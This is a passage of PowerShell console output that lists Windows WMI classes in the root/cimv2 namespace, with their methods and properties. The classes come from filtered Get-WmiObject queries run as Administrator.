DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHitUncorrelated...}\nWin32_PerfRawData_ESENT_Database... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHit_Base...}\nWin32_PerfFormattedData_LocalSes... {} {ActiveSessions, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_LocalSessionMa... {} {ActiveSessions, Caption, Description, Frequency_Object...}\nWin32_PerfFormattedData_Lsa_Secu... {} {Caption, ContextHandles, CredentialHandles, Description...}\nWin32_PerfRawData_Lsa_SecurityPe... {} {Caption, ContextHandles, CredentialHandles, Description...}\nWin32_PerfFormattedData_Lsa_Secu... {} {ActiveSchannelSessionCacheEntries, Caption, Description, DigestAuthentications...}\nWin32_PerfRawData_Lsa_SecuritySy... {} {ActiveSchannelSessionCacheEntries, Caption, Description, DigestAuthentications...}\nWin32_PerfFormattedData_MSDTC_Di... {} {AbortedTransactions, AbortedTransactionsPersec, ActiveTransactions, ActiveTransactionsMaximum...}\nWin32_PerfRawData_MSDTC_Distribu... {} {AbortedTransactions, AbortedTransactionsPersec, ActiveTransactions, ActiveTransactionsMaximum...}\nWin32_PerfFormattedData_MSDTCBri... {} {Averageparticipantcommitresponsetime, Averageparticipantprepareresponsetime, Caption, CommitretrycountPersec...}\nWin32_PerfRawData_MSDTCBridge400... {} {Averageparticipantcommitresponsetime, Averageparticipantcommitresponsetime_Base, Averageparticipantprepareresponsetime, Averageparticipantpre...\nWin32_PerfFormattedData_NETCLRDa... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETCLRData_NET... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETCLRNe... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...}\nWin32_PerfRawData_NETCLRNetworki... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...}\nWin32_PerfFormattedData_NETCLRNe... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...}\nWin32_PerfRawData_NETCLRNetworki... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...}\nWin32_PerfFormattedData_NETDataP... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETDataProvide... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETDataP... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETDataProvide... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETFrame... {} {AssemblySearchLength, BytesinLoaderHeap, Caption, Currentappdomains...}\nWin32_PerfRawData_NETFramework_N... {} {AssemblySearchLength, BytesinLoaderHeap, Caption, Currentappdomains...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, ContentionRatePersec, CurrentQueueLength, Description...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, ContentionRatePersec, CurrentQueueLength, Description...}\nWin32_PerfFormattedData_NETFrame... {} {AllocatedBytesPersec, Caption, Description, FinalizationSurvivors...}\nWin32_PerfRawData_NETFramework_N... {} {AllocatedBytesPersec, Caption, Description, FinalizationSurvivors...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, Channels, ContextBoundClassesLoaded, ContextBoundObjectsAllocPersec...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, Channels, ContextBoundClassesLoaded, ContextBoundObjectsAllocPersec...}\nWin32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_NETMemor... {} {CacheEntries, CacheHitRatio, CacheHits, CacheMisses...}\nWin32_PerfRawData_NETMemoryCache... {} {CacheEntries, CacheHitRatio, CacheHitRatio_Base, CacheHits...}\nWin32_PerfFormattedData_NTDS_NTDS {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...}\nWin32_PerfRawData_NTDS_NTDS {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...}\nWin32_PerfFormattedData_PerfDisk... {} {AvgDiskBytesPerRead, AvgDiskBytesPerTransfer, AvgDiskBytesPerWrite, AvgDiskQueueLength...}\nWin32_PerfRawData_PerfDisk_Logic... {} {AvgDiskBytesPerRead, AvgDiskBytesPerRead_Base, AvgDiskBytesPerTransfer, AvgDiskBytesPerTransfer_Base...}\nWin32_PerfFormattedData_PerfDisk... {} {AvgDiskBytesPerRead, AvgDiskBytesPerTransfer, AvgDiskBytesPerWrite, AvgDiskQueueLength...}\nWin32_PerfRawData_PerfDisk_Physi... {} {AvgDiskBytesPerRead, AvgDiskBytesPerRead_Base, AvgDiskBytesPerTransfer, AvgDiskBytesPerTransfer_Base...}\nWin32_PerfFormattedData_PerfNet_... {} {AnnouncementsDomainPersec, AnnouncementsServerPersec, AnnouncementsTotalPersec, Caption...}\nWin32_PerfRawData_PerfNet_Browser {} {AnnouncementsDomainPersec, AnnouncementsServerPersec, AnnouncementsTotalPersec, Caption...}\nWin32_PerfFormattedData_PerfNet_... {} {BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec, Caption...}\nWin32_PerfRawData_PerfNet_Redire... {} {BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec, Caption...}\nWin32_PerfFormattedData_PerfNet_... {} {BlockingRequestsRejected, BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec...}\nWin32_PerfRawData_PerfNet_Server {} {BlockingRequestsRejected, BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec...}\nWin32_PerfFormattedData_PerfNet_... {} {ActiveThreads, AvailableThreads, AvailableWorkItems, BorrowedWorkItems...}\nWin32_PerfRawData_PerfNet_Server... {} {ActiveThreads, AvailableThreads, AvailableWorkItems, BorrowedWorkItems...}\nWin32_PerfFormattedData_PerfOS_C... {} {AsyncCopyReadsPersec, AsyncDataMapsPersec, AsyncFastReadsPersec, AsyncMDLReadsPersec...}\nWin32_PerfRawData_PerfOS_Cache {} {AsyncCopyReadsPersec, AsyncDataMapsPersec, AsyncFastReadsPersec, AsyncMDLReadsPersec...}\nWin32_PerfFormattedData_PerfOS_M... {} {AvailableBytes, AvailableKBytes, AvailableMBytes, CacheBytes...}\nWin32_PerfRawData_PerfOS_Memory {} {AvailableBytes, AvailableKBytes, AvailableMBytes, CacheBytes...}\nWin32_PerfFormattedData_PerfOS_N... {} {AvailableMBytes, Caption, Description, FreeAndZeroPageListMBytes...}\nWin32_PerfRawData_PerfOS_NUMANod... {} {AvailableMBytes, Caption, Description, FreeAndZeroPageListMBytes...}\nWin32_PerfFormattedData_PerfOS_O... {} {Caption, Description, Events, Frequency_Object...}\nWin32_PerfRawData_PerfOS_Objects {} {Caption, Description, Events, Frequency_Object...}\nWin32_PerfFormattedData_PerfOS_P... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_PerfOS_PagingFile {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_PerfOS_P... {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...}\nWin32_PerfRawData_PerfOS_Processor {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...}\nWin32_PerfFormattedData_PerfOS_S... {} {AlignmentFixupsPersec, Caption, ContextSwitchesPersec, Description...}\nWin32_PerfRawData_PerfOS_System {} {AlignmentFixupsPersec, Caption, ContextSwitchesPersec, Description...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...}\nWin32_PerfRawData_PerfProc_FullI... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...}\nWin32_PerfRawData_PerfProc_Image... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, CurrentPercentKernelModeTime, CurrentPercentProcessorTime, CurrentPercentUserModeTime...}\nWin32_PerfRawData_PerfProc_JobOb... {} {Caption, CurrentPercentKernelModeTime, CurrentPercentProcessorTime, CurrentPercentUserModeTime...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, CreatingProcessID, Description, ElapsedTime...}\nWin32_PerfRawData_PerfProc_JobOb... {} {Caption, CreatingProcessID, Description, ElapsedTime...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, CreatingProcessID, Description, ElapsedTime...}\nWin32_PerfRawData_PerfProc_Process {} {Caption, CreatingProcessID, Description, ElapsedTime...}\nWin32_PerfFormattedData_PerfProc... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...}\nWin32_PerfRawData_PerfProc_Proce... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, ContextSwitchesPersec, Description, ElapsedTime...}\nWin32_PerfRawData_PerfProc_Thread {} {Caption, ContextSwitchesPersec, Description, ElapsedTime...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_PerfProc_Threa... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_PowerMet... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_PowerMeterCoun... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_RemoteAc... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...}\nWin32_PerfRawData_RemoteAccess_R... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...}\nWin32_PerfFormattedData_RemoteAc... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...}\nWin32_PerfRawData_RemoteAccess_R... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...}\nWin32_PerfFormattedData_ServiceM... {} {Calls, CallsDuration, CallsFailed, CallsFailedPerSecond...}\nWin32_PerfRawData_ServiceModel40... {} {Calls, CallsDuration, CallsDuration_Base, CallsFailed...}\nWin32_PerfFormattedData_ServiceM... {} {CallFailedPerSecond, Calls, CallsDuration, CallsFailed...}\nWin32_PerfRawData_ServiceModel40... {} {CallFailedPerSecond, Calls, CallsDuration, CallsDuration_Base...}\nWin32_PerfFormattedData_ServiceM... {} {Calls, CallsDuration, CallsFailed, CallsFailedPerSecond...}\nWin32_PerfRawData_ServiceModel40... {} {Calls, CallsDuration, CallsDuration_Base, CallsFailed...}\nWin32_PerfFormattedData_SMSvcHos... {} {Caption, ConnectionsAcceptedovernetpipe, ConnectionsAcceptedovernettcp, ConnectionsDispatchedovernetpipe...}\nWin32_PerfRawData_SMSvcHost4000_... {} {Caption, ConnectionsAcceptedovernetpipe, ConnectionsAcceptedovernettcp, ConnectionsDispatchedovernetpipe...}\nWin32_PerfFormattedData_Spooler_... {} {AddNetworkPrinterCalls, BytesPrintedPersec, Caption, Description...}\nWin32_PerfRawData_Spooler_PrintQ... {} {AddNetworkPrinterCalls, BytesPrintedPersec, Caption, Description...}\nWin32_PerfFormattedData_TapiSrv_... {} {ActiveLines, ActiveTelephones, Caption, ClientApps...}\nWin32_PerfRawData_TapiSrv_Telephony {} {ActiveLines, ActiveTelephones, Caption, ClientApps...}\nWin32_PerfFormattedData_Tcpip_ICMP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Tcpip_ICMP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Tcpip_IC... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_Tcpip_ICMPv6 {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Tcpip_IPv4 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...}\nWin32_PerfRawData_Tcpip_IPv4 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...}\nWin32_PerfFormattedData_Tcpip_IPv6 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...}\nWin32_PerfRawData_Tcpip_IPv6 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...}\nWin32_PerfFormattedData_Tcpip_NB... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfRawData_Tcpip_NBTConne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfFormattedData_Tcpip_Ne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfRawData_Tcpip_NetworkA... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfFormattedData_Tcpip_Ne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfRawData_Tcpip_NetworkI... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...}\nWin32_PerfFormattedData_Tcpip_TCPv4 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...}\nWin32_PerfRawData_Tcpip_TCPv4 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...}\nWin32_PerfFormattedData_Tcpip_TCPv6 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...}\nWin32_PerfRawData_Tcpip_TCPv6 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...}\nWin32_PerfFormattedData_Tcpip_UDPv4 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...}\nWin32_PerfRawData_Tcpip_UDPv4 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...}\nWin32_PerfFormattedData_Tcpip_UDPv6 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...}\nWin32_PerfRawData_Tcpip_UDPv6 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...}\nWin32_PerfFormattedData_TCPIPCou... {} {Caption, Deniedconnectorsendrequestsinlowpowermode, Description, Frequency_Object...}\nWin32_PerfRawData_TCPIPCounters_... {} {Caption, Deniedconnectorsendrequestsinlowpowermode, Description, Frequency_Object...}\nWin32_PerfFormattedData_TermServ... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_TermService_Te... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_usbhub_USB {} {AvgBytesPerTransfer, AvgmslatencyforISOtransfers, BulkBytesPerSec, Caption...}\nWin32_PerfRawData_usbhub_USB {} {AvgBytesPerTransfer, AvgBytesPerTransfer_Base, AvgmslatencyforISOtransfers, AvgmslatencyforISOtransfers_Base...}\nWin32_PerfFormattedData_WindowsW... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_WindowsWorkflo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_WinNatCo... {} {Caption, CurrentSessionCount, Description, DroppedICMPerrorpackets...}\nWin32_PerfRawData_WinNatCounters... {} {Caption, CurrentSessionCount, Description, DroppedICMPerrorpackets...}\nWin32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...}\nWin32_PerfFormattedData_Workflow... {} {AverageWorkflowLoadTime, AverageWorkflowPersistTime, Caption, Description...}\nWin32_PerfRawData_WorkflowServic... {} {AverageWorkflowLoadTime, AverageWorkflowLoadTime_Base, AverageWorkflowPersistTime, AverageWorkflowPersistTime_Base...}\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Namespace \"root/cimv2\" -List | Where-Object {$_.Name -match \"process\"}\n\n NameSpace: ROOT\\cimv2\n\nName Methods Properties\n---- ------- ----------\nWin32_ProcessTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...}\nWin32_ProcessStartTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...}\nWin32_ProcessStopTrace {} {ExitStatus, ParentProcessID, ProcessID, ProcessName...}\nWin32_NamedJobObjectProcess {} {Collection, Member}\nCIM_Processor {SetPowerState, R... {AddressWidth, Availability, Caption, ConfigManagerErrorCode...}\nWin32_Processor {SetPowerState, R... {AddressWidth, Architecture, Availability, Caption...}\nCIM_Process {} {Caption, CreationClassName, CreationDate, CSCreationClassName...}\nWin32_Process {Create, Terminat... {Caption, CommandLine, CreationClassName, CreationDate...}\nWin32_ProcessStartup {} {CreateFlags, EnvironmentVariables, ErrorMode, FillAttribute...}\nWin32_ComputerSystemProcessor {} {GroupComponent, PartComponent}\nWin32_SystemProcesses {} {GroupComponent, PartComponent}\nCIM_ProcessThread {} {GroupComponent, PartComponent}\nCIM_OSProcess {} {GroupComponent, PartComponent}\nCIM_ProcessExecutable {} {Antecedent, BaseAddress, Dependent, GlobalProcessCount...}\nWin32_SessionProcess {} {Antecedent, Dependent}\nCIM_AssociatedProcessorMemory {} {Antecedent, BusSpeed, Dependent}\nWin32_AssociatedProcessorMemory {} {Antecedent, BusSpeed, Dependent}\nWin32_PerfFormattedData_Counters... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...}\nWin32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherCyclesPersec, Caption, Description, Frequency_Object...}\nWin32_PerfFormattedData_Counters... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...}\nWin32_PerfRawData_Counters_PerPr... {} {BuildScatterGatherListCallsPersec, Caption, Description, DPCsDeferredPersec...}\nWin32_PerfFormattedData_Counters... {} {AverageIdleTime, C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec...}\nWin32_PerfRawData_Counters_Proce... {} {AverageIdleTime, AverageIdleTime_Base, C1TransitionsPersec, C2TransitionsPersec...}\nWin32_PerfFormattedData_Lsa_Secu... {} {Caption, ContextHandles, CredentialHandles, Description...}\nWin32_PerfRawData_Lsa_SecurityPe... {} {Caption, ContextHandles, CredentialHandles, Description...}\nWin32_PerfFormattedData_PerfOS_P... {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...}\nWin32_PerfRawData_PerfOS_Processor {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...}\nWin32_PerfFormattedData_PerfProc... {} {Caption, CreatingProcessID, Description, ElapsedTime...}\nWin32_PerfRawData_PerfProc_Process {} {Caption, CreatingProcessID, Description, ElapsedTime...}\nWin32_PerfFormattedData_PerfProc... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...}\nWin32_PerfRawData_PerfProc_Proce... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...}\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Namespace \"root/cimv2\" -List | Where-Object {$_.Name -match \"computer\"}\n\n NameSpace: ROOT\\cimv2\n\nName Methods Properties\n---- ------- ----------\nWin32_ComputerSystemEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_ComputerShutdownEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED, Type}\nCIM_ComputerSystem {} {Caption, CreationClassName, Description, InstallDate...}\nCIM_UnitaryComputerSystem {SetPowerState} {Caption, CreationClassName, Description, InitialLoadInfo...}\nWin32_ComputerSystem {SetPowerState, R... {AdminPasswordStatus, AutomaticManagedPagefile, AutomaticResetBootOption, AutomaticResetCapability...}\nCIM_ComputerSystemResource {} {GroupComponent, PartComponent}\nCIM_ComputerSystemMappedIO {} {GroupComponent, PartComponent}\nCIM_ComputerSystemDMA {} {GroupComponent, PartComponent}\nCIM_ComputerSystemIRQ {} {GroupComponent, PartComponent}\nWin32_ComputerSystemProcessor {} {GroupComponent, PartComponent}\nCIM_ComputerSystemPackage {} {Antecedent, Dependent}\nWin32_ComputerSystemProduct {} {Caption, Description, IdentifyingNumber, Name...}\nWin32_NTLogEventComputer {} {Computer, Record}\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Namespace \"root/cimv2\" -List | Where-Object {$_.Name -match \"win32\"}\n\n NameSpace: ROOT\\cimv2\n\nName Methods Properties\n---- ------- ----------\n__Win32Provider {} {ClientLoadableCLSID, CLSID, Concurrency, DefaultMachineName...}\nWin32_ComputerSystemEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_ComputerShutdownEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED, Type}\nWin32_IP4RouteTableEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_SystemTrace {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_ProcessTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...}\nWin32_ProcessStartTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...}\nWin32_ProcessStopTrace {} {ExitStatus, ParentProcessID, ProcessID, ProcessName...}\nWin32_ModuleTrace {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_ModuleLoadTrace {} {DefaultBase, FileName, ImageBase, ImageChecksum...}\nWin32_ThreadTrace {} {ProcessID, SECURITY_DESCRIPTOR, ThreadID, TIME_CREATED}\nWin32_ThreadStartTrace {} {ProcessID, SECURITY_DESCRIPTOR, StackBase, StackLimit...}\nWin32_ThreadStopTrace {} {ProcessID, SECURITY_DESCRIPTOR, ThreadID, TIME_CREATED}\nWin32_PowerManagementEvent {} {EventType, OEMEventCode, SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_DeviceChangeEvent {} {EventType, SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_SystemConfigurationChangeE... {} {EventType, SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_VolumeChangeEvent {} {DriveName, EventType, SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_PrivilegesStatus {} {Description, Operation, ParameterInfo, PrivilegesNotHeld...}\nWin32_JobObjectStatus {} {AdditionalDescription, Description, Operation, ParameterInfo...}\nWin32_Trustee {} {Domain, Name, SID, SidLength...}\nWin32_ACE {} {AccessMask, AceFlags, AceType, GuidInheritedObjectType...}\nWin32_SecurityDescriptor {} {ControlFlags, DACL, Group, Owner...}\nWin32_CollectionStatistics {} {Collection, Stats}\nWin32_NamedJobObjectStatistics {} {Collection, Stats}\nWin32_NTLogEvent {} {Category, CategoryString, ComputerName, Data...}\nWin32_ActiveRoute {} {SameElement, SystemElement}\nWin32_AccountSID {} {Element, Setting}\nWin32_SecurityDescriptorHelper {Win32SDToSDDL, W... {}\nWin32_TimeZone {} {Bias, Caption, DaylightBias, DaylightDay...}\nWin32_PageFileSetting {} {Caption, Description, InitialSize, MaximumSize...}\nWin32_Desktop {} {BorderWidth, Caption, CoolSwitch, CursorBlinkRate...}\nWin32_ShadowContext {} {Caption, ClientAccessible, Description, Differential...}\nWin32_MSIResource {} {Caption, Description, SettingID}\nWin32_ServiceControl {} {Arguments, Caption, Description, Event...}\nWin32_Property {} {Caption, Description, ProductCode, Property...}\nWin32_Patch {} {Attributes, Caption, Description, File...}\nWin32_PatchPackage {} {Caption, Description, PatchID, ProductCode...}\nWin32_Binary {} {Caption, Data, Description, Name...}\nWin32_AutochkSetting {} {Caption, Description, SettingID, UserInputDelay}\nWin32_SerialPortConfiguration {} {AbortReadWriteOnError, BaudRate, BinaryModeEnabled, BitsPerByte...}\nWin32_StartupCommand {} {Caption, Command, Description, Location...}\nWin32_BootConfiguration {} {BootDirectory, Caption, ConfigurationPath, Description...}\nWin32_NetworkLoginProfile {} {AccountExpires, AuthorizationFlags, BadPasswordCount, Caption...}\nWin32_NamedJobObjectLimitSetting {} {ActiveProcessLimit, Affinity, Caption, Description...}\nWin32_NamedJobObjectSecLimitSetting {} {Caption, Description, PrivilegesToDelete, RestrictedSIDs...}\nWin32_DisplayConfiguration {} {BitsPerPel, Caption, Description, DeviceName...}\nWin32_NetworkAdapterConfiguration {EnableDHCP, Rene... {ArpAlwaysSourceRoute, ArpUseEtherSNAP, Caption, DatabasePath...}\nWin32_QuotaSetting {} {Caption, DefaultLimit, DefaultWarningLimit, Description...}\nWin32_SecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, SettingID}\nWin32_LogicalFileSecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, OwnerPermissions...}\nWin32_LogicalShareSecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, Name...}\nWin32_DisplayControllerConfigura... {} {BitsPerPixel, Caption, ColorPlanes, Description...}\nWin32_WMISetting {} {ASPScriptDefaultNamespace, ASPScriptEnabled, AutorecoverMofs, AutoStartWin9X...}\nWin32_OSRecoveryConfiguration {} {AutoReboot, Caption, DebugFilePath, DebugInfoType...}\nWin32_COMSetting {} {Caption, Description, SettingID}\nWin32_ClassicCOMClassSetting {} {AppID, AutoConvertToClsid, AutoTreatAsClsid, Caption...}\nWin32_DCOMApplicationSetting {GetLaunchSecurit... {AppID, AuthenticationLevel, Caption, CustomSurrogate...}\nWin32_VideoConfiguration {} {ActualColorResolution, AdapterChipType, AdapterCompatibility, AdapterDACType...}\nWin32_ODBCAttribute {} {Attribute, Caption, Description, Driver...}\nWin32_ODBCSourceAttribute {} {Attribute, Caption, DataSource, Description...}\nWin32_PrinterConfiguration {} {BitsPerPel, Caption, Collate, Color...}\nWin32_CurrentTime {} {Day, DayOfWeek, Hour, Milliseconds...}\nWin32_UTCTime {} {Day, DayOfWeek, Hour, Milliseconds...}\nWin32_LocalTime {} {Day, DayOfWeek, Hour, Milliseconds...}\nWin32_ShortcutAction {Invoke} {ActionID, Arguments, Caption, Description...}\nWin32_ExtensionInfoAction {Invoke} {ActionID, Argument, Caption, Command...}\nWin32_CreateFolderAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_RegistryAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_ClassInfoAction {Invoke} {ActionID, AppID, Argument, Caption...}\nWin32_SelfRegModuleAction {Invoke} {ActionID, Caption, Cost, Description...}\nWin32_TypeLibraryAction {Invoke} {ActionID, Caption, Cost, Description...}\nWin32_BindImageAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_RemoveIniAction {Invoke} {Action, ActionID, Caption, Description...}\nWin32_MIMEInfoAction {Invoke} {ActionID, Caption, CLSID, ContentType...}\nWin32_FontInfoAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_PublishComponentAction {Invoke} {ActionID, AppData, Caption, ComponentID...}\nWin32_MoveFileAction {Invoke} {ActionID, Caption, Description, DestFolder...}\nWin32_DuplicateFileAction {Invoke} {ActionID, Caption, DeleteAfterCopy, Description...}\nWin32_RemoveFileAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_ProductResource {} {Product, Resource}\nWin32_FolderRedirectionHealth {} {HealthStatus, LastSuccessfulSyncTime, LastSyncStatus, LastSyncTime...}\nWin32_MountPoint {} {Directory, Volume}\nWin32_UserProfile {ChangeOwner} {AppDataRoaming, Contacts, Desktop, Documents...}\nWin32_RoamingProfileMachineConfi... {} {AddAdminGroupToRUPEnabled, AllowCrossForestUserPolicy, BackgroundUploadParams, DeleteProfilesOlderDays...}\nWin32_ManagedSystemElementResource {} {}\nWin32_SoftwareElementResource {} {Element, Setting}\nWin32_SID {} {AccountName, BinaryRepresentation, ReferencedDomainName, SID...}\nWin32_ActionCheck {} {Action, Check}\nWin32_UserDesktop {} {Element, Setting}\nWin32_DeviceSettings {} {Element, Setting}\nWin32_PrinterSetting {} {Element, Setting}\nWin32_NetworkAdapterSetting {} {Element, Setting}\nWin32_SerialPortSetting {} {Element, Setting}\nWin32_SystemSetting {} {Element, Setting}\nWin32_SystemProgramGroups {} {Element, Setting}\nWin32_SystemBootConfiguration {} {Element, Setting}\nWin32_SystemTimeZone {} {Element, Setting}\nWin32_SystemDesktop {} {Element, Setting}\nWin32_ClassicCOMClassSettings {} {Element, Setting}\nWin32_VolumeQuota {} {Element, 